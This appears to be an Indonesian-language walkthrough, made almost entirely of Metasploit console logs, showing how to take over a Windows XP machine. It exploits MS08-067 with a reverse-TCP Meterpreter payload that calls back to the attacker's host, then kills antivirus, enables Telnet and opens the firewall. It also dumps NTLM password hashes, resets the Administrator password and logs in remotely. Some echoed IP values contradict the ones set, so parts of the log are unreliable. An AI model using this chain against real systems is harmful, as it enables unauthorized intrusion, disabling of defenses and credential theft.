msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.100.1 LHOST => 192.168.1.45 msf exploit(ms08_067_netapi) > set RHOST 192.168.100.2 RHOST => 192.168.1.200 msf exploit(ms08_067_netapi) > exploit -f [*] Started reverse handler on 192.168.100.1:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (748032 bytes) to 192.168.100.2 [*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.2:1913)
kill av, get telnet
meterpreter > run killav [*] Killing Antivirus services on the target... [*] Killing off cmd.exe... meterpreter > run gettelnet -e [*] Windows Telnet Server Enabler Meterpreter Script [*] Setting Telnet Server Services service startup mode [*] The Telnet Server Services service is not set to auto, changing it to auto ... [*] Opening port in local firewall if necessary
kalo ada account selain Administrator,
meterpreter > hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: victim:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:7d006c3deefcb55524e896ae900db85e:3c877a4ddf86e32f4c1e5b36217db268::: SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:77d358f2c00b3af0f58f110c778d7f05:::
execute, interact
meterpreter > execute -f cmd.exe -c Process 6220 created. Channel 8 created. meterpreter > interact 8 Interacting with channel 8...
Set password Administrator ke “password”
C:\WINDOWS>net user Administrator password net user Administrator password The command completed successfully.
Kita lihat apakah port 23 (telnet) sudah terbuka
root@bt:~# nmap -p 23 192.168.100.2 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-06 07:37 UTC Interesting ports on 192.168.100.2: PORT STATE SERVICE 23/tcp open telnet MAC Address: 00:1F:C6:0B:1A:A1 (victim Computer) Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Masuk lewat telnet
root@bt:~# telnet 192.168.100.2 Trying 192.168.100.2... Connected to 192.168.100.2. Escape character is '^]'. Welcome to Microsoft Telnet Service login: Administrator password: *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\>
